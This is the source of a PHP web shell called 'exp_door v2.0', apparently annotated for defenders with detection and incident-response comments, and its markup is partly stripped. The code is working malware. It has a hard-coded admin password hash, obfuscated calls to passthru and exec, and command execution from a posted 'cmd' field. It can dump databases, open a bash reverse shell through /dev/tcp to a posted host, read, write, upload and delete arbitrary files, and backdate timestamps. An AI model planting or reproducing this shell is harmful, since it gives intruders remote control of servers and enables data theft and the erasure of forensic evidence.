"; $string.= "" . '
'; $string.= "" . '
'; $string.= "" . '
'; $string.= "" . '
' . '
'; $string.= ""; $string.= ""; return $string; }
// NOTE(review): the line above is the tail of a function whose start is not
// part of this text (presumably showForm(), which the last line of the file
// calls). The markup it appended to $string was stripped by the extraction.

/**
 * Access gate used by the rest of the file.
 *
 * Returns true only when $login equals "admin" and $pass equals the
 * hard-coded 32-hex-character string below; both comparisons use loose ==.
 * The two call sites in this file pass md5() of the posted password and the
 * raw value of the "pass" cookie, so the stored value is compared as an MD5
 * digest. The trailing "testpass" note is the author's own; it is not
 * verified here.
 *
 * Defender note: the credential is fixed in the file, so any copy of this
 * script found on a host has to be treated as reachable by anyone who has
 * seen the sample, not only by whoever planted it. The literal digest is a
 * stable string for file-system and repository scans.
 */
function check($login, $pass) {
    if (($login == "admin") && ($pass == "a4225f7a4eacbcaf85d7e64b085ae241")) return true; //testpass
    else return false;
}

// Login: the posted password is hashed with md5() and, when check() accepts
// the pair, the login name and the digest are stored in two cookies named
// "login" and "pass". setcookie() is called with name and value only, so no
// expiry, path, Secure or HttpOnly attribute is set. Requests to a PHP file
// carrying these two cookie names are a useful hunting pattern in web logs
// that record cookies.
if (isset($_POST['log'])) {
    $login = $_POST['login'];
    $pass = md5($_POST['pass']);
    if (check($login, $pass)) {
        setcookie("login", $login);
        setcookie("pass", $pass);
        header("Refresh:0"); // or header("Location: http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
    } else echo "Access denied!";
}

// Logout: expires both cookies (timestamp one hour in the past, path "/")
// and reloads the page. $login and $pass are only assigned in the login
// branch above, so they may be undefined here.
if (isset($_POST['exit'])) {
    setcookie("login", $login, time() - 3600, '/');
    setcookie("pass", $pass, time() - 3600, '/');
    header("Refresh:0");
}
// NOTE(review): what follows the closing tag is residue of stripped markup
// (the page title) and the tail of a function whose header was lost in
// extraction, presumably printPerms(), which is called further down.
?> exp_door v2.0 ' . $s . ''; } elseif (strpos($s, 'rw', -3)) { return '' . $s . ''; } else { return '' . $s . ''; } }

// Formats the permission bits of $file as the last four octal digits of
// fileperms(). When the leading digit is greater than 1 (which, for Unix
// mode bits, means setuid or setgid is set) the first branch is taken; the
// two branches differ only in markup that the extraction removed.
function numPerms($file) {
    $numperm = substr(sprintf('%o', fileperms($file)), -4);
    if ((int)(substr($numperm, 0, 1)) > 1) { return '' . $numperm . ''; } else { return '' . $numperm . ''; }
}
$home = '

exp_door v2.0

'; echo $home;
// The working directory is taken from the request ("path" in POST when
// submitBtn is present, otherwise "path" in GET, defaulting to this script's
// directory) and chdir() is called on it. This runs before the cookie check
// below, i.e. for unauthenticated requests as well.
if (isset($_POST['submitBtn'])) { $actpath = isset($_POST['path']) ? $_POST['path'] : __DIR__; chdir($actpath); }
else { $actpath = isset($_GET['path']) ? $_GET['path'] : __DIR__; chdir($actpath); }
// Every request is authenticated from the two cookies alone; there is no
// server-side session. Everything from here to the final "else" of the file
// runs only when check() accepts them.
$login = $_COOKIE['login'];
$pass = $_COOKIE['pass'];
if (check($login, $pass)) {
    // The name "passthru" is assembled from three fragments and later called
    // through $a1 as a variable function, so the literal function name never
    // appears in the file. Detection that greps for the function name alone
    // will miss this; flag callables built by string concatenation, and rely
    // on runtime signals such as the web-server account spawning processes.
    $a1 = 'pas' . 'sth' . 'ru';
    $cwd = $_GET['path'];
    if (empty($cwd)) { $cwd = getcwd(); }
    // Host inventory shown at the top of the page: OS string, PHP version,
    // temp directory, and free/total space of "/" converted to Mb or Gb.
    $uname = php_uname();
    $php = phpversion();
    $temp_file = sys_get_temp_dir();
    $df = disk_free_space("/");
    $dt = disk_total_space("/");
    $freeSpace = $df / 1048576;
    $freeUnit = 'Mb';
    if ($freeSpace >= 1024) { $freeSpace/= 1024; $freeUnit = 'Gb'; }
    $totalSpace = $dt / 1048576;
    $totalUnit = 'Mb';
    if ($totalSpace >= 1024) { $totalSpace/= 1024; $totalUnit = 'Gb'; }
    $freePer = round($df / $dt * 100.0, 2);
    if ($freePer > 100) $freePer = 100;
    echo '
';
    // Runs the external "id" command through $a1 on every authenticated page
    // load. A PHP worker executing "id" is therefore a recurring
    // process-creation event that endpoint telemetry can key on.
    echo 'id    | ';
    echo $a1("id");
    // The remaining lines print the values gathered above plus the server
    // name, address and software, the current date, and the working
    // directory with its permissions.
    echo 'uname | ' . $uname . '
'; echo 'tmp | ' . $temp_file . ' ' . substr(sprintf('%o', fileperms($temp_file)), -4) . '
'; echo 'php | ' . $php . '
'; echo 'server| ' . $_SERVER['SERVER_NAME'] . ' ' . $_SERVER["SERVER_ADDR"] . ' ' . $_SERVER['SERVER_SOFTWARE'] . '
'; echo 'date | ' . date("Y-m-d-H:i:s e P") . ' GMT' . '
'; echo 'HDD | ' . "Total: " . round($totalSpace, 2) . " " . $totalUnit . " "; echo "Free: " . round($freeSpace, 2) . " " . $freeUnit . "(" . $freePer . "%)" . '
'; echo 'cwd | ' . $cwd . ' ' . "[" . numPerms($actpath) . "] " . printPerms($actpath) . '
'; echo '
'; echo '
';
/**
 * Renders the main view for the directory $path.
 *
 * The body continues well past this line: it emits the tool panel, handles
 * the tool-panel POST fields, and then lists the directory entries (links,
 * files, directories) with permissions, owner/group, modification time and
 * size. No return statement is visible in it, although the caller echoes
 * its result.
 */
function showContent($path) {
    if ($handle = opendir($path)) {
        // Parent directory used by the "Up one level" link; falls back to
        // "/" when the computed parent is empty.
        $up = substr($path, 0, (strrpos(dirname($path . "/."), "/")));
        if ($up == NULL) { $up = "/"; }
        $HTML = '

Hide tools










'; echo $HTML;
    // Function names are assembled from fragments and called through
    // variables: $a1 is "passthru", $b2 is "exec", $aTwo and $bTwo are
    // "base64_encode" and "base64_decode". This keeps the literal names out
    // of the file to defeat simple signature matching. Useful static
    // indicators are the concatenation pattern itself and variable-function
    // calls on request data; where the application does not need them,
    // listing process-execution functions in PHP's disable_functions
    // directive removes this capability.
    $a1 = 'pas' . 'sth' . 'ru';
    $b2 = 'ex' . 'ec';
    // NOTE(review): $down is assigned here, but the handler for the "down"
    // field below only echoes an empty string in this text; whatever used it
    // was stripped with the markup.
    $down = "which get;which wget;which lynx;which curl;which fetch;which links;";
    $aTwo = "ba" . "se" . "6" . "4" . "_" . "en" . "co" . "de";
    $bTwo = "ba" . "se" . "6" . "4" . "_" . "de" . "co" . "de";
    // The base64 literal decodes to a shell pipeline that prints PHP's
    // defined functions and filters them for process-execution and
    // file-reading function names. The base64 text is a stable scan string.
    $fun = $bTwo("cGhwIC1yICdwcmludF9yKGdldF9kZWZpbmVkX2Z1bmN0aW9ucygpKTsnIHwgZ3JlcCAtRSAnIChzeXN0ZW18ZXhlY3xzaGVsbF9leGVjfHBhc3N0aHJ1fHByb2Nfb3Blbnxwb3BlbnxjdXJsX2V4ZWN8Y3VybF9tdWx0aV9leGVjfHBhcnNlX2luaV9maWxlfHNob3dfc291cmNlKSc");
    // The posted "cmd" value is handed unchanged to passthru(): arbitrary
    // command execution as the web-server account, with the output written
    // straight into the response. On a compromised host, POST requests to
    // this script line up with child processes of the PHP worker.
    if (isset($_POST['cmd'])) { echo '
';
                $a1($_POST['cmd']);
                echo '
'; }
    // Full phpinfo() output: configuration, loaded modules and environment
    // values are disclosed to the requester.
    if (isset($_POST['info'])) { echo phpinfo(); }
    if (isset($_POST['down'])) { echo ''; }
    // Runs the decoded pipeline from $fun through passthru().
    if (isset($_POST['fun'])) { echo '
';
                $a1($fun);
                echo '
'; }
    // Database dump: connects with request-supplied host, user, password,
    // database name and port, then runs mysqldump through exec() with those
    // values concatenated into the command line without escaping. Output is
    // redirected to the relative path file.sql, so the dump lands in the
    // current working directory. For incident response, look for file.sql in
    // web-reachable directories and treat every database reachable from this
    // host with locally readable credentials as exposed.
    if (isset($_POST['DB'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $name = $_POST['name']; $port = $_POST['port']; $link = new mysqli($host, $user, $pass, $name, $port); if ($link->connect_error) { die("Database access is not available:
" . $link->connect_error); exit(); } else { $b2('mysqldump --port=' . $port . ' --user=' . $user . ' --password=' . $pass . ' --host=' . $host . ' ' . $name . ' > file.sql'); echo 'Dump completed!'; } }
    // Base64-encodes the posted "base64" field and prints the result.
    if (isset($_POST['submit'])) { $base64 = $_POST['base64']; $encode = $aTwo($base64); echo '

' . "Encode base64: " . '

' . $encode; } if (isset($_POST['submit2'])) { $base64_d = $_POST['base64']; $decode = $bTwo($base64_d); echo '

' . "Decode base64: " . '

' . htmlentities($decode); } if (isset($_POST['submit_u'])) { $url = $_POST['url']; $encode_u = urlencode($url); echo '

' . "Encode url: " . '

' . $encode_u; } if (isset($_POST['submit_u2'])) { $url_d = $_POST['url']; $decode_u = urldecode($url_d); echo '

' . "Decode url: " . '

' . htmlentities($decode_u); } if (isset($_POST['submit_hex'])) { $h = $_POST['hex']; $encode_hex = "0x" . bin2hex($h); echo '

' . "Encode HEX: " . '

' . $encode_hex; } if (isset($_POST['submit_hex2'])) { $h2 = $_POST['hex']; $decode_hex = hex2bin(substr($h2, 2)); echo '

' . "Decode HEX: " . '

' . htmlentities($decode_hex); }
// Outbound shell: the posted "host_" field is split on "|" into an address
// and a port, and passthru() ($a1) starts an interactive bash whose streams
// are redirected to a TCP connection to that endpoint. The connection is
// initiated by the web server, so inbound firewall rules do not stop it.
// Defender view: alert on the web-server account spawning bash with
// "/dev/tcp/" in the command line, and restrict egress from web hosts to the
// destinations the application needs.
if (isset($_POST['reverse'])) { $back = explode("|", $_POST['host_']); $a1("bash -c 'bash -i &> /dev/tcp/$back[0]/$back[1] 0>&1'"); }
$HTML2 = '
' . "" . '
Up one level Path:
'; echo $HTML2 . "
"; echo "" . "" . "" . "" . "" . "" . ""; $alldir = array(); $allfile = array(); $alllink = array(); while (false !== ($file = readdir($handle))) { if (is_link($path . '/' . $file)) { array_push($alllink, $file); } elseif (is_file($path . '/' . $file)) { array_push($allfile, $file); } elseif (is_dir($path . '/' . $file)) { array_push($alldir, $file); } } closedir($handle); } else { echo '
Can\'t open folder!

--> Go back <--
'; } sort($alldir); sort($allfile); sort($alllink); $allfiles = array_merge($alldir, $allfile, $alllink); foreach ($allfiles as $file) { if ($file != "." && $file != "..") { $fName = $file; $userinfo = posix_getpwuid(fileowner($file)) ["name"] . "/" . posix_getgrgid(filegroup($file)) ["name"]; if (strlen($path) == 1) { $file = $path . $file; } else { $file = $path . '/' . $file; } if (is_link($file)) { $disppath = readlink($file); if (strpos($disppath, "/") != 0) { $disppath = "/" . $disppath; } if (is_file(readlink($file))) { echo "" . "" . "" . "" . "" . ""; } else { echo "" . "" . "" . "" . "" . ""; } } elseif (is_file($file)) { $endsize = ""; $fullsize = filesize($file); if ($fullsize < 1024) { $endsize = "B"; } elseif ($fullsize < 1048576) { $endsize = "KB"; $fullsize/= 1024; } elseif ($fullsize < 1073741824) { $endsize = "MB"; $fullsize/= 1048576; } echo "" . "" . "" . "" . "" . ""; } elseif (is_dir($file)) { echo "" . "" . "" . "" . "" . ""; } } } echo "
" . "Name" . "" . "Action" . "" . "Permissions" . "" . "Owner/Group" . "" . "Modify" . "" . "Size" . "
" . "" . "➦" . "" . "" . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "LINK
" . "" . "$fName " . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "LINK
" . "" . " " . "" . "" . "" . "" . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "" . round($fullsize, 2) . " " . $endsize . "
" . "" . " $fName" . "" . "" . "" . "" . "" . "[" . numPerms($file) . "] " . printPerms($file) . "" . $userinfo . "" . date('d-m-Y H:i:s', filemtime($file)) . "DIR
"; } echo showContent($actpath); function removeDirectory($dir) { if ($objs = glob($dir . "/*")) { foreach ($objs as $obj) { is_dir($obj) ? removeDirectory($obj) : unlink($obj); } } return rmdir($dir); } $modal = '
';
// Delete: every path in the posted "choose" array is removed. Links and
// files go through unlink(); further down, directories are passed to
// removeDirectory(). Paths are used as received, with no restriction to a
// base directory. For incident response this means missing logs or files
// on the host are not evidence that they never existed.
if (isset($_POST['del'])) { if (!empty($_POST['choose'])) { foreach ($_POST['choose'] as $value) { if (is_link($value)) { if (unlink($value)) { echo str_replace("text", '

' . "The link was successfully deleted!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! The link was not deleted!" . '

', $modal); } } elseif (is_file($value)) { if (unlink($value)) { echo str_replace("text", '

' . "The file was successfully deleted!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! The file was not deleted!" . '

', $modal); } } elseif (is_dir($value)) { if (removeDirectory($value)) { echo str_replace("text", '

' . "Directory deleted!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! The directory was not deleted!" . '

', $modal); } } } } } if (isset($_POST['edit'])) { if (!empty($_POST['choose'])) { $val = $_POST['choose'][0]; if (is_readable($val)) { $formedit = "
Close
"; echo $formedit; } else { echo str_replace("text", '

' . "Error! Can't open file!" . '

', $modal); } } }
// Edit/save: writes the posted "edit_code" content to the path named in the
// posted "correction" field with file_put_contents(). That is an arbitrary
// file write with the web-server account's privileges. After finding this
// script, compare the web root and any writable configuration against a
// known-good copy rather than trusting the files in place.
if (isset($_POST['edit_code'])) { $result = file_put_contents($_POST['correction'], $_POST['edit_code']); if ($result === FALSE) { echo str_replace("text", '

' . "Error writing to file!" . '

', $modal); } else { echo str_replace("text", '

' . "The file was successfully modified!" . '

', $modal); } }
// View: reads the file named in the posted "view" field in 4096-byte chunks
// and, further down, prints it with highlight_string(). Any file readable
// by the web-server account can be retrieved this way, so configuration
// files, keys and credentials on the host should be considered disclosed
// and rotated.
if (isset($_POST['view'])) { if (is_readable($_POST['view'])) { $doc = fopen($_POST['view'], "rt"); $contents = ''; while (!feof($doc)) $contents.= fread($doc, 4096); fclose($doc); if (filesize($_POST['view']) == 0) { echo str_replace("text", '

' . "The file is empty!" . '

', $modal); } elseif ($contents) { echo '
' . '
' . "
"; highlight_string($contents); echo "
" . 'Close' . "
" . "
"; } } else { echo str_replace("text", '

' . "Error! Can't open file!" . '

', $modal); } } if (isset($_POST['up']) && !empty($_POST['choose'])) { echo '
' . '" . "
"; }
// Upload: this branch is not tied to a button field; it runs whenever the
// "filename" upload reports no error. The destination is the posted
// "up_file" directory joined with the client-supplied file name, and
// nothing checks the file type or the target location. Files created under
// the web root around the times this script was requested should be
// treated as attacker-placed.
if ($_FILES['filename']['error'] == UPLOAD_ERR_OK) { $name = $_POST['up_file'] . '/' . $_FILES['filename']['name']; if (move_uploaded_file($_FILES['filename']['tmp_name'], $name)) { $text = '

' . "The file was uploaded successfully!" . '

'; $newphrase = str_replace("text", $text, $modal); echo $newphrase; } } else { echo str_replace("text", '

' . "Error! The file is not selected!" . '

', $modal); } if (isset($_POST['tou']) && !empty($_POST['choose'])) { echo '
' . '" . "
"; }
// Timestamp change: touch() sets the modification time of the path in
// "date_file" to the date posted in "code", parsed by strtotime().
// Forensic consequence: modification times of files writable by the
// web-server account cannot be relied on for timeline work on this host.
// Cross-check with inode change time, web-server logs and backups.
if (isset($_POST['code'])) { if (touch($_POST['date_file'], strtotime($_POST['code']))) { $text = '

' . "Modification date changed!" . '

'; $newphrase = str_replace("text", $text, $modal); echo $newphrase; } else { echo str_replace("text", '

' . "Error! You couldn't change the date!" . '

', $modal); } } if (isset($_POST['ren']) && !empty($_POST['choose'])) { echo '
' . '" . "
"; }
// Rename: moves the path in "ren_file" to the name in "r_code" with
// rename(). Both values come from the request unchanged, so this also
// relocates files between directories the web-server account can write to.
if (isset($_POST['r_code'])) { if (rename($_POST['ren_file'], $_POST['r_code'])) { echo str_replace("text", '

' . "Renaming completed!" . '

', $modal); } else { echo str_replace("text", '

' . "Error! Not renamed!" . '

', $modal); } } echo '
'; } else echo showForm(); ?>